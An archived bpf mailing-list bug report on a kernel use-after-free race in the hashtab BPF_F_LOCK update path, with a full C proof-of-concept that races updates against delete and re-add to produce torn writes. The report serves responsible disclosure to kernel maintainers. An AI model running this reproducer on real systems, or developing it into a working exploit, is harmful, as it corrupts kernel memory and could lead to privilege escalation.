public inbox for bpf@vger.kernel.org
 help / color / mirror / Atom feed
* [BUG] bpf: use-after-free in hashtab BPF_F_LOCK in-place update path
@ 2026-03-26  8:49 Aaron Esau
  2026-03-26 13:39 ` Puranjay Mohan
  0 siblings, 1 reply; 12+ messages in thread
From: Aaron Esau @ 2026-03-26  8:49 UTC (permalink / raw)
  To: bpf; +Cc: ast, daniel, andrii

[-- Attachment #1: Type: text/plain, Size: 1885 bytes --]

Reported-by: Aaron Esau <aaron1esau@gmail.com>

htab_map_update_elem() has a use-after-free when BPF_F_LOCK is used
for in-place updates.

The BPF_F_LOCK path calls lookup_nulls_elem_raw() without holding the
bucket lock, then dereferences the element via copy_map_value_locked().
A concurrent htab_map_delete_elem() can delete and free the element
between these steps.

free_htab_elem() uses bpf_mem_cache_free(), which immediately returns
the object to the per-CPU free list (not RCU-deferred). The memory may
be reallocated before copy_map_value_locked() executes, leading to
writes into a different element.

When lookup succeeds (l_old != NULL), the in-place update path returns
early, so the “full lookup under lock” path is not taken.

Race:

  CPU 0: htab_map_update_elem (BPF_F_LOCK)
         lookup_nulls_elem_raw() → E (no bucket lock)
         ...
  CPU 1: htab_map_delete_elem()
         htab_lock_bucket → hlist_nulls_del_rcu → htab_unlock_bucket
         free_htab_elem → bpf_mem_cache_free (immediate free)
  CPU 1: htab_map_update_elem (new key)
         alloc_htab_elem → reuses E
  CPU 0: copy_map_value_locked(E, ...) → writes into reused object

Reproduction:

  1. Create BPF_MAP_TYPE_HASH with a value containing bpf_spin_lock
     (max_entries=64, 7 u64 fields + lock).
  2. Threads A: BPF_MAP_UPDATE_ELEM with BPF_F_LOCK (pattern 0xAAAA...)
  3. Threads B: DELETE + UPDATE (pattern 0xBBBB...) on same keys
  4. Threads C: same as A (pattern 0xCCCC...)
  5. Verifier threads: LOOKUP loop, detect mixed-pattern values
  6. Run 60s on >=4 CPUs

Attached a POC. On 6.19.9 (4 vCPU QEMU, CONFIG_PREEMPT=y),
I observed ~645 torn values in 2.5M checks (~0.026%).

Fixes: 96049f3afd50 ("bpf: introduce BPF_F_LOCK flag")

System:
  Linux 6.19.9, x86_64, GCC 15.2.1
  CONFIG_BPF_SYSCALL=y, CONFIG_PREEMPT=y

[-- Attachment #2: poc-bpf-hashtab-uaf.c --]
[-- Type: text/x-csrc, Size: 13434 bytes --]

/*
 * BPF hashtab UAF — torn write reproducer
 *
 * Races BPF_F_LOCK in-place updates against concurrent delete+re-add
 * on the same key. Detects torn writes (mixed patterns in a single
 * value) which prove the unlocked lookup returned a stale element.
 *
 * Requires: CONFIG_BPF_SYSCALL=y, root/CAP_BPF, SMP (>= 4 CPUs)
 */

#define _GNU_SOURCE
#include <errno.h>
#include <inttypes.h>
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/wait.h>

#ifndef __NR_bpf
#define __NR_bpf 321
#endif

/* bpf(2) command numbers (subset of enum bpf_cmd from the kernel UAPI);
 * the values must match the kernel exactly. */
enum bpf_cmd_num {
	BPF_MAP_CREATE_CMD       = 0,
	BPF_MAP_LOOKUP_ELEM_CMD  = 1,
	BPF_MAP_UPDATE_ELEM_CMD  = 2,
	BPF_MAP_DELETE_ELEM_CMD  = 3,
	BPF_BTF_LOAD_CMD         = 18,
};

/* Map type, element-update flags, and BTF constants from the kernel UAPI. */
#define BPF_MAP_TYPE_HASH    1
#define BPF_ANY     0	/* create or update */
#define BPF_EXIST   2	/* update only; fail if the key is absent */
#define BPF_F_LOCK  4	/* take the value's bpf_spin_lock during the op */
#define BPF_F_NO_PREALLOC (1U << 0)

#define BTF_MAGIC   0xeB9F
#define BTF_VERSION 1
#define BTF_KIND_INT    1
#define BTF_KIND_STRUCT 4
#define BTF_INT_SIGNED (1 << 0)

/*
 * Header of a raw BTF blob (mirrors struct btf_header in the kernel UAPI).
 * type_off/str_off are byte offsets relative to the end of this header;
 * type_len/str_len are section sizes in bytes.
 */
struct btf_header {
	uint16_t magic;		/* BTF_MAGIC (0xeB9F) */
	uint8_t  version;	/* BTF_VERSION */
	uint8_t  flags;
	uint32_t hdr_len;	/* sizeof(struct btf_header) */
	uint32_t type_off;
	uint32_t type_len;
	uint32_t str_off;
	uint32_t str_len;
};

/*
 * One BTF type record (mirrors struct btf_type). `info` packs the kind
 * and vlen (see btf_info_enc()); the union holds a byte size for
 * INT/STRUCT kinds or a referenced type id for reference kinds.
 */
struct btf_type {
	uint32_t name_off;	/* byte offset into the BTF string section */
	uint32_t info;
	union { uint32_t size; uint32_t type; };
};

/* Struct member record following a BTF_KIND_STRUCT type; `offset` is in bits. */
struct btf_member {
	uint32_t name_off;	/* byte offset into the BTF string section */
	uint32_t type;		/* member's type id */
	uint32_t offset;
};

/*
 * Encode a btf_type.info word: kind in bits 24+, vlen in the low
 * 16 bits (mirrors the kernel's BTF_INFO_ENC with kind_flag = 0).
 */
static inline uint32_t btf_info_enc(uint32_t kind, uint32_t vlen)
{
	uint32_t info = vlen & 0xffffu;

	info |= kind << 24;
	return info;
}

/*
 * BPF_MAP_CREATE view of the kernel's union bpf_attr. Field order and
 * widths must match the start of the kernel's layout byte-for-byte;
 * the syscall takes an explicit size, so trailing kernel fields we
 * don't declare are simply not passed.
 */
struct bpf_attr_map_create {
	uint32_t map_type;
	uint32_t key_size;
	uint32_t value_size;
	uint32_t max_entries;
	uint32_t map_flags;
	uint32_t inner_map_fd;
	uint32_t numa_node;
	char     map_name[16];
	uint32_t map_ifindex;
	uint32_t btf_fd;		/* BTF object describing key/value types */
	uint32_t btf_key_type_id;
	uint32_t btf_value_type_id;
};

/* BPF_BTF_LOAD view of union bpf_attr; pointers are passed as u64. */
struct bpf_attr_btf_load {
	uint64_t btf;		/* user pointer to the raw BTF blob */
	uint64_t btf_log_buf;	/* user pointer to the verifier log buffer */
	uint32_t btf_size;
	uint32_t btf_log_size;
	uint32_t btf_log_level;
};

/*
 * Element-access view of union bpf_attr (lookup/update/delete).
 * `__pad0` keeps `key` at offset 8, matching the kernel layout where
 * the 64-bit pointer fields are 8-byte aligned.
 */
struct bpf_attr_map_elem {
	uint32_t map_fd;
	uint32_t __pad0;	/* explicit padding for 64-bit alignment */
	uint64_t key;		/* user pointer to the key */
	union {
		uint64_t value;		/* user pointer to the value */
		uint64_t next_key;
	};
	uint64_t flags;		/* BPF_ANY / BPF_EXIST / BPF_F_LOCK ... */
};

/*
 * Thin wrapper around the raw bpf(2) syscall. Returns the syscall
 * result directly: an fd or 0 on success, -1 with errno on failure.
 */
static long bpf_sys(int cmd, void *attr, unsigned int size)
{
	long ret;

	ret = syscall(__NR_bpf, cmd, attr, size);
	return ret;
}

/*
 * Map value layout. Must stay in sync with the BTF built in load_btf():
 * `lock` stands in for struct bpf_spin_lock and must sit at offset 0,
 * which is where the BTF declares the spin lock to the kernel.
 */
struct map_value {
	uint32_t lock;		/* bpf_spin_lock slot (kernel-managed) */
	uint32_t seq;		/* writer-side sequence number */
	uint64_t data[7];	/* payload words filled with one PATTERN_* */
};

#define VALUE_SIZE sizeof(struct map_value)
#define NUM_DATA_FIELDS 7

/* Distinct per-writer fill patterns; any mix inside one value is a torn write. */
#define PATTERN_A 0xAAAAAAAAAAAAAAAAULL
#define PATTERN_B 0xBBBBBBBBBBBBBBBBULL
#define PATTERN_C 0xCCCCCCCCCCCCCCCCULL

/*
 * Build a minimal raw BTF blob by hand and load it via BPF_BTF_LOAD.
 *
 * Type ids are assigned in emission order, starting at 1:
 *   1: "int"            signed 32-bit int             (map key type)
 *   2: "bpf_spin_lock"  struct { __u32 val; }
 *   3: "__u32"          unsigned 32-bit int
 *   4: "map_value"      struct, members at bit 0 and bit 32
 *
 * The literal name_off values below are byte offsets into `strings`:
 * 1="int", 5="bpf_spin_lock", 19="val", 23="__u32", 29="map_value",
 * 39="lock", 44="data". Member `offset` fields are in bits.
 *
 * Returns the BTF fd, or -1 on failure (error printed to stderr).
 */
static int load_btf(void)
{
	static const char strings[] =
		"\0" "int\0" "bpf_spin_lock\0" "val\0"
		"__u32\0" "map_value\0" "lock\0" "data\0";

	/* id 1: int, 32-bit signed (extra word encodes the INT metadata) */
	struct btf_type t1 = { 1, btf_info_enc(BTF_KIND_INT, 0), {4} };
	uint32_t t1_extra = (BTF_INT_SIGNED << 24) | 32;
	/* id 2: struct bpf_spin_lock with one __u32 member "val" */
	struct btf_type t2 = { 5, btf_info_enc(BTF_KIND_STRUCT, 1), {4} };
	struct btf_member t2_m = { 19, 3, 0 };
	/* id 3: __u32, 32-bit unsigned */
	struct btf_type t3 = { 23, btf_info_enc(BTF_KIND_INT, 0), {4} };
	uint32_t t3_extra = 32;
	/* id 4: struct map_value; the spin lock member must be at bit 0 */
	struct btf_type t4 = { 29, btf_info_enc(BTF_KIND_STRUCT, 2), {VALUE_SIZE} };
	struct btf_member t4_m1 = { 39, 2, 0 };
	/* NOTE(review): this member is named "data" but is declared as a
	 * lone __u32 at bit 32 (the C struct's `seq` slot) rather than the
	 * u64[7] array; presumably only the lock position matters to the
	 * kernel here — confirm. */
	struct btf_member t4_m2 = { 44, 3, 32 };

	uint32_t type_len =
		sizeof(t1) + sizeof(t1_extra) +
		sizeof(t2) + sizeof(t2_m) +
		sizeof(t3) + sizeof(t3_extra) +
		sizeof(t4) + sizeof(t4_m1) + sizeof(t4_m2);
	uint32_t str_len = sizeof(strings);
	uint32_t blob_sz = sizeof(struct btf_header) + type_len + str_len;

	char *blob = calloc(1, blob_sz);
	if (!blob) return -1;

	/* Header: type section immediately follows, strings after that. */
	struct btf_header *hdr = (struct btf_header *)blob;
	hdr->magic = BTF_MAGIC;
	hdr->version = BTF_VERSION;
	hdr->hdr_len = sizeof(struct btf_header);
	hdr->type_off = 0;
	hdr->type_len = type_len;
	hdr->str_off = type_len;
	hdr->str_len = str_len;

	char *p = blob + sizeof(struct btf_header);
#define EMIT(x) do { memcpy(p, &(x), sizeof(x)); p += sizeof(x); } while(0)
	EMIT(t1); EMIT(t1_extra);
	EMIT(t2); EMIT(t2_m);
	EMIT(t3); EMIT(t3_extra);
	EMIT(t4); EMIT(t4_m1); EMIT(t4_m2);
#undef EMIT
	memcpy(p, strings, str_len);

	char log_buf[4096] = {};
	struct bpf_attr_btf_load attr = {};
	attr.btf = (uint64_t)(unsigned long)blob;
	attr.btf_size = blob_sz;
	attr.btf_log_buf = (uint64_t)(unsigned long)log_buf;
	attr.btf_log_size = sizeof(log_buf);
	attr.btf_log_level = 1;

	int fd = bpf_sys(BPF_BTF_LOAD_CMD, &attr, sizeof(attr));
	if (fd < 0)
		fprintf(stderr, "BTF load failed: %s\n", strerror(errno));
	free(blob);
	return fd;
}

static int create_map(int btf_fd, uint32_t max_entries)
{
	struct bpf_attr_map_create attr = {};
	attr.map_type = BPF_MAP_TYPE_HASH;
	attr.key_size = sizeof(uint32_t);
	attr.value_size = VALUE_SIZE;
	attr.max_entries = max_entries;
	attr.map_flags = BPF_F_NO_PREALLOC;
	attr.btf_fd = btf_fd;
	attr.btf_key_type_id = 1;
	attr.btf_value_type_id = 4;

	int fd = bpf_sys(BPF_MAP_CREATE_CMD, &attr, sizeof(attr));
	if (fd < 0)
		fprintf(stderr, "Map create failed: %s\n", strerror(errno));
	return fd;
}

static int map_update(int fd, uint32_t *key, struct map_value *val, uint64_t flags)
{
	struct bpf_attr_map_elem attr = {};
	attr.map_fd = fd;
	attr.key = (uint64_t)(unsigned long)key;
	attr.value = (uint64_t)(unsigned long)val;
	attr.flags = flags;
	return bpf_sys(BPF_MAP_UPDATE_ELEM_CMD, &attr, sizeof(attr));
}

static int map_delete(int fd, uint32_t *key)
{
	struct bpf_attr_map_elem attr = {};
	attr.map_fd = fd;
	attr.key = (uint64_t)(unsigned long)key;
	return bpf_sys(BPF_MAP_DELETE_ELEM_CMD, &attr, sizeof(attr));
}

static int map_lookup(int fd, uint32_t *key, struct map_value *val)
{
	struct bpf_attr_map_elem attr = {};
	attr.map_fd = fd;
	attr.key = (uint64_t)(unsigned long)key;
	attr.value = (uint64_t)(unsigned long)val;
	return bpf_sys(BPF_MAP_LOOKUP_ELEM_CMD, &attr, sizeof(attr));
}

/* All workers share this address space (CLONE_VM); the stop flag, stats,
 * and event log additionally live in a MAP_SHARED mapping carved up in
 * main(). */
static volatile int *g_stop;
static int g_map_fd;		/* the contended hash map */
static uint32_t g_key = 1;	/* single key all racing workers target */

/* Counters maintained by worker_verify(). Increments are volatile but
 * not atomic, so totals are approximate with more than one verifier. */
struct shared_stats {
	volatile uint64_t total_checks;
	volatile uint64_t torn_writes;
	volatile uint64_t unknown_pattern;
	volatile uint64_t a_into_b, b_into_a;	/* minority pattern X inside majority-Y value */
	volatile uint64_t c_into_a, a_into_c;
	volatile uint64_t b_into_c, c_into_b;
	volatile uint64_t max_torn_fields;	/* worst torn-field count seen in one value */
};
static struct shared_stats *g_stats;

/* Detailed records of the first MAX_LOG_EVENTS corruption sightings. */
#define MAX_LOG_EVENTS 20
struct corruption_event {
	uint64_t check_num;	/* verify-loop iteration that caught it */
	uint32_t seq;		/* seq field of the corrupted value */
	uint64_t data[NUM_DATA_FIELDS];
	int      field_owners[NUM_DATA_FIELDS];	/* pattern_owner() per field */
};
static volatile int *g_log_count;
static struct corruption_event *g_log;

#define STACK_SIZE (1024 * 1024)	/* per-worker clone stack size */

/*
 * Map a data word back to the writer family that produced it:
 * 0 = PATTERN_A, 1 = PATTERN_B, 2 = PATTERN_C, -1 = unrecognized.
 */
static int pattern_owner(uint64_t val)
{
	switch (val) {
	case PATTERN_A:
		return 0;
	case PATTERN_B:
		return 1;
	case PATTERN_C:
		return 2;
	default:
		return -1;
	}
}

/* Initialize *v: zeroed lock slot, caller's seq, every data word = pattern. */
static void fill_value(struct map_value *v, uint64_t pattern, uint32_t seq)
{
	int i = NUM_DATA_FIELDS;

	v->lock = 0;
	v->seq = seq;
	while (i-- > 0)
		v->data[i] = pattern;
}

/*
 * Updater worker: hammer the shared key with BPF_F_LOCK | BPF_EXIST
 * in-place updates carrying a fixed fill pattern (passed via arg)
 * until the stop flag is raised.
 */
static int worker_update(void *arg)
{
	const uint64_t pattern = (uint64_t)(unsigned long)arg;
	uint32_t seq = 0;
	struct map_value val;

	for (; !*g_stop; seq++) {
		fill_value(&val, pattern, seq);
		map_update(g_map_fd, &g_key, &val, BPF_F_LOCK | BPF_EXIST);
	}
	return 0;
}

/*
 * Delete+re-add worker: repeatedly frees the element for the shared key
 * and re-inserts it with PATTERN_B, creating the window in which a
 * BPF_F_LOCK updater can write into a freed/reused element.
 */
static int worker_delete_readd(void *arg)
{
	struct map_value val;
	uint32_t seq = 0;

	(void)arg;
	while (!*g_stop) {
		map_delete(g_map_fd, &g_key);
		fill_value(&val, PATTERN_B, seq);
		seq++;
		map_update(g_map_fd, &g_key, &val, BPF_ANY);
	}
	return 0;
}

static int worker_pressure(void *arg)
{
	int btf_fd = (int)(long)arg;
	struct map_value val;
	memset(&val, 0, sizeof(val));

	int fd = create_map(btf_fd, 256);
	if (fd < 0)
		return 1;

	while (!*g_stop) {
		for (uint32_t i = 0; i < 200; i++) {
			uint32_t k = i;
			val.seq = i;
			map_update(fd, &k, &val, BPF_ANY);
		}
		for (uint32_t i = 0; i < 200; i++) {
			uint32_t k = i;
			map_delete(fd, &k);
		}
	}

	close(fd);
	return 0;
}

/*
 * Verify worker: repeatedly look up the contended key and classify each
 * of the 7 data words by writer pattern. A value mixing two or more
 * patterns (or containing an unrecognized word) is a torn write —
 * evidence that a BPF_F_LOCK update landed in a freed/reused element.
 *
 * NOTE(review): the shared counters are incremented non-atomically and
 * two verify workers run concurrently, so stats may slightly undercount;
 * presumably acceptable for a PoC — confirm.
 */
static int worker_verify(void *arg)
{
	(void)arg;
	struct map_value val;
	uint64_t checks = 0;

	while (!*g_stop) {
		/* Lookup fails while the delete+readd worker has the key
		 * out of the map; still count the attempt. */
		if (map_lookup(g_map_fd, &g_key, &val) != 0) {
			checks++;
			continue;
		}

		int owners[NUM_DATA_FIELDS];
		int has_a = 0, has_b = 0, has_c = 0, has_unk = 0;

		for (int i = 0; i < NUM_DATA_FIELDS; i++) {
			owners[i] = pattern_owner(val.data[i]);
			switch (owners[i]) {
			case 0:  has_a++; break;
			case 1:  has_b++; break;
			case 2:  has_c++; break;
			default: has_unk++; break;
			}
		}

		/* Number of distinct known patterns present in this value. */
		int distinct = (has_a > 0) + (has_b > 0) + (has_c > 0);

		if (distinct >= 2 || has_unk > 0) {
			g_stats->torn_writes++;

			/* Majority pattern is treated as the value's owner;
			 * minority fields are the torn intruders. */
			int majority = (has_a >= has_b && has_a >= has_c) ? 0 :
				       (has_b >= has_c) ? 1 : 2;
			uint64_t torn_fields = 0;
			for (int i = 0; i < NUM_DATA_FIELDS; i++)
				if (owners[i] != majority)
					torn_fields++;
			if (torn_fields > g_stats->max_torn_fields)
				g_stats->max_torn_fields = torn_fields;

			/* Per-direction breakdown: pattern o found inside a
			 * majority-m value. */
			for (int i = 0; i < NUM_DATA_FIELDS; i++) {
				int o = owners[i], m = majority;
				if (o == m) continue;
				if (o == 0 && m == 1) g_stats->a_into_b++;
				if (o == 1 && m == 0) g_stats->b_into_a++;
				if (o == 2 && m == 0) g_stats->c_into_a++;
				if (o == 0 && m == 2) g_stats->a_into_c++;
				if (o == 1 && m == 2) g_stats->b_into_c++;
				if (o == 2 && m == 1) g_stats->c_into_b++;
				if (o == -1)          g_stats->unknown_pattern++;
			}

			/* Atomically claim a log slot; only the first
			 * MAX_LOG_EVENTS events are recorded in detail. */
			int idx = __sync_fetch_and_add(g_log_count, 1);
			if (idx < MAX_LOG_EVENTS) {
				g_log[idx].check_num = checks;
				g_log[idx].seq = val.seq;
				for (int i = 0; i < NUM_DATA_FIELDS; i++) {
					g_log[idx].data[i] = val.data[i];
					g_log[idx].field_owners[i] = owners[i];
				}
			}
		}

		checks++;
	}

	g_stats->total_checks += checks;
	return 0;
}

/*
 * Start a CLONE_VM worker (thread-like: shared address space and file
 * table) running fn(arg) on a freshly mmap'd stack. Returns the child
 * pid, or -1 on error. The stack is never unmapped — workers run until
 * the process exits.
 */
static pid_t spawn_worker(int (*fn)(void *), void *arg)
{
	void *stk;
	pid_t child;

	stk = mmap(NULL, STACK_SIZE, PROT_READ | PROT_WRITE,
		   MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);
	if (stk == MAP_FAILED) {
		perror("mmap stack");
		return -1;
	}

	/* Stack grows down: pass the high end to clone(). */
	child = clone(fn, (char *)stk + STACK_SIZE,
		      CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SIGHAND | SIGCHLD,
		      arg);
	if (child < 0)
		perror("clone");
	return child;
}

/* Workload mix: 2 pattern-A and 2 pattern-C BPF_F_LOCK updaters,
 * 2 delete+readd workers (pattern B), 2 allocator-pressure workers on a
 * private map, and 2 verify workers scanning for torn values. */
#define RACE_SECONDS 60
#define NUM_UPDATE_A 2
#define NUM_DELETE_B 2
#define NUM_UPDATE_C 2
#define NUM_PRESSURE 2
#define NUM_VERIFY   2
#define TOTAL (NUM_UPDATE_A + NUM_DELETE_B + NUM_UPDATE_C + NUM_PRESSURE + NUM_VERIFY)

/*
 * Orchestrate the reproducer:
 *  - set up a MAP_SHARED region for the stop flag, stats, and event log;
 *  - probe bpf(2), load the BTF, create the contended map, seed key 1;
 *  - spawn the updater/delete/pressure/verify workers;
 *  - run for RACE_SECONDS, stop everyone, and print the verdict.
 *
 * Fix vs. the original: the uint64_t counters were printed with "%lu",
 * which only matches on LP64 targets; use PRIu64 (<inttypes.h>) so the
 * format specifiers are correct on every ABI.
 */
int main(void)
{
	/* Four pages: page 0 holds flag + stats + log count; the event log
	 * starts on the second page. */
	size_t shm_sz = 4096 * 4;
	void *shm = mmap(NULL, shm_sz, PROT_READ | PROT_WRITE,
			 MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	if (shm == MAP_FAILED) {
		perror("mmap shared");
		return 1;
	}
	memset(shm, 0, shm_sz);

	g_stop = (volatile int *)shm;
	g_stats = (struct shared_stats *)((char *)shm + 64);	/* off the flag's cache line */
	g_log_count = (volatile int *)((char *)shm + 64 + sizeof(struct shared_stats));
	g_log = (struct corruption_event *)((char *)shm + 4096);

	/* Probe for bpf(2): an all-zero attr is expected to fail, but only
	 * ENOSYS means the syscall itself is missing. */
	struct bpf_attr_map_create test = {};
	if (bpf_sys(BPF_MAP_CREATE_CMD, &test, sizeof(test)) < 0 && errno == ENOSYS) {
		fprintf(stderr, "BPF syscall not available\n");
		return 1;
	}

	int btf_fd = load_btf();
	if (btf_fd < 0)
		return 1;

	g_map_fd = create_map(btf_fd, 8);
	if (g_map_fd < 0)
		return 1;

	/* Seed the contended key so BPF_EXIST updates can succeed at once. */
	struct map_value init_val;
	fill_value(&init_val, PATTERN_B, 0);
	if (map_update(g_map_fd, &g_key, &init_val, BPF_ANY) < 0) {
		fprintf(stderr, "Initial update failed: %s\n", strerror(errno));
		return 1;
	}

	printf("Running %d threads for %d seconds...\n", TOTAL, RACE_SECONDS);

	pid_t pids[TOTAL];
	int idx = 0;

	for (int i = 0; i < NUM_UPDATE_A; i++)
		pids[idx++] = spawn_worker(worker_update, (void *)PATTERN_A);
	for (int i = 0; i < NUM_DELETE_B; i++)
		pids[idx++] = spawn_worker(worker_delete_readd, NULL);
	for (int i = 0; i < NUM_UPDATE_C; i++)
		pids[idx++] = spawn_worker(worker_update, (void *)PATTERN_C);
	for (int i = 0; i < NUM_PRESSURE; i++)
		pids[idx++] = spawn_worker(worker_pressure, (void *)(long)btf_fd);
	for (int i = 0; i < NUM_VERIFY; i++)
		pids[idx++] = spawn_worker(worker_verify, NULL);

	sleep(RACE_SECONDS);
	*g_stop = 1;

	for (int i = 0; i < TOTAL; i++)
		if (pids[i] > 0)
			waitpid(pids[i], NULL, 0);

	int logged = *g_log_count;
	if (logged > MAX_LOG_EVENTS) logged = MAX_LOG_EVENTS;

	printf("\nTotal checks:    %" PRIu64 "\n", g_stats->total_checks);
	printf("Torn writes:     %" PRIu64 "\n", g_stats->torn_writes);
	printf("Max torn fields: %" PRIu64 " / %d\n", g_stats->max_torn_fields,
	       NUM_DATA_FIELDS);

	if (g_stats->torn_writes > 0) {
		/* torn_writes > 0 implies total_checks > 0, so no div-by-zero. */
		double rate = (double)g_stats->torn_writes /
			      g_stats->total_checks * 100.0;
		printf("Corruption rate: %.6f%%\n", rate);

		printf("\nCross-pattern breakdown:\n");
		if (g_stats->a_into_b) printf("  A in B: %" PRIu64 "\n", g_stats->a_into_b);
		if (g_stats->b_into_a) printf("  B in A: %" PRIu64 "\n", g_stats->b_into_a);
		if (g_stats->c_into_a) printf("  C in A: %" PRIu64 "\n", g_stats->c_into_a);
		if (g_stats->a_into_c) printf("  A in C: %" PRIu64 "\n", g_stats->a_into_c);
		if (g_stats->b_into_c) printf("  B in C: %" PRIu64 "\n", g_stats->b_into_c);
		if (g_stats->c_into_b) printf("  C in B: %" PRIu64 "\n", g_stats->c_into_b);
		if (g_stats->unknown_pattern)
			printf("  Unknown: %" PRIu64 "\n", g_stats->unknown_pattern);
	}

	if (logged > 0) {
		printf("\nFirst %d events:\n", logged);
		for (int e = 0; e < logged; e++) {
			printf("  [%d] check #%" PRIu64 " seq=%u ",
			       e, g_log[e].check_num, g_log[e].seq);
			/* One letter per data word: A/B/C pattern, '?' unknown. */
			for (int i = 0; i < NUM_DATA_FIELDS; i++) {
				char c = '?';
				if (g_log[e].data[i] == PATTERN_A) c = 'A';
				else if (g_log[e].data[i] == PATTERN_B) c = 'B';
				else if (g_log[e].data[i] == PATTERN_C) c = 'C';
				printf("%c", c);
			}
			printf("\n");
		}
	}

	printf("\n%s\n", g_stats->torn_writes > 0 ?
	       "CORRUPTION DETECTED" :
	       "No corruption detected (try more CPUs or longer run)");

	close(g_map_fd);
	close(btf_fd);
	return 0;
}

^ permalink raw reply	[flat|nested] 12+ messages in thread

end of thread, other threads:[~2026-03-27 16:09 UTC | newest]

Thread overview: 12+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2026-03-26  8:49 [BUG] bpf: use-after-free in hashtab BPF_F_LOCK in-place update path Aaron Esau
2026-03-26 13:39 ` Puranjay Mohan
2026-03-26 14:58   ` Kumar Kartikeya Dwivedi
2026-03-26 15:02   ` Puranjay Mohan
2026-03-26 15:26   ` Mykyta Yatsenko
2026-03-26 15:33     ` Puranjay Mohan
2026-03-26 15:43       ` Mykyta Yatsenko
2026-03-26 15:47         ` Mykyta Yatsenko
2026-03-26 15:57           ` Puranjay Mohan
2026-03-27  2:44             ` Aaron Esau
2026-03-27  3:21               ` Kumar Kartikeya Dwivedi
2026-03-27 16:09                 ` Mykyta Yatsenko

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox